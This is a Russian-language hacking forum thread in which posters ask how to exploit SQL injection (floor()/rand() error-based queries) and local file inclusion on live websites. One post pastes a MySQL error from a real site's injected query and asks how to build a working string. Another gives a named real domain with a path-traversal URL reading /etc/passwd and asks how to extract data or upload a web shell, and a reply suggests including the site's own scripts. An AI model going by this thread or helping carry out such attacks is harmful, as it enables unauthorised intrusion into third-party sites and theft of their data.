интересна...
вот мне интересна floor() rand() где про них можно почитать всегда на них сталкиваюсь иль по другому еще можно сделать запрос? и как называется эта инъекция (в смысле фильтрация иль что???)
интересна...
вот мне интересна floor() rand() где про них можно почитать всегда на них сталкиваюсь иль по другому еще можно сделать запрос? и как называется эта инъекция (в смысле фильтрация иль что???)
сюда http://forum.antichat.ru/thread119047-blind.html
Select count(v1.id) as count FROM user_table as v1 WHERE v1.step='9' && v1.sex=1\' && v1.age1 >= '18' && v1.age1 <= '99' && v1.country='1' && v1.plzahl like'1%' && v1.zeitlogin>1114276250 1064:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' && v1.age1 >= '18' && v1.age1 <= '99' && v1.country='1' && v1.plzahl like'1%'' at line 3
Но что-то никак не выходит раскрутить, подскажите гуру как тут можно сформировать строку правильно?
Подскажите.. разбираюсь щас с пхп-инъекц..
нашел сайт, там присутствует локальный инклюд, внешнего нету, что я могу зделать???
могу ли чтото добыть интересное или залить шелл какимто образом??
сайт: http://www.sidi-kaouki.com/new/index.php?f=../../../../../../../etc/passwd
Подскажите.. разбираюсь щас с пхп-инъекц..
нашел сайт, там присутствует локальный инклюд, внешнего нету, что я могу зделать???
могу ли чтото добыть интересное или залить шелл какимто образом??
сайт: http://www.sidi-kaouki.com/new/index.php?f=../../../../../../../etc/passwd
попробуй найти путь к скриптам и инклудить скрипты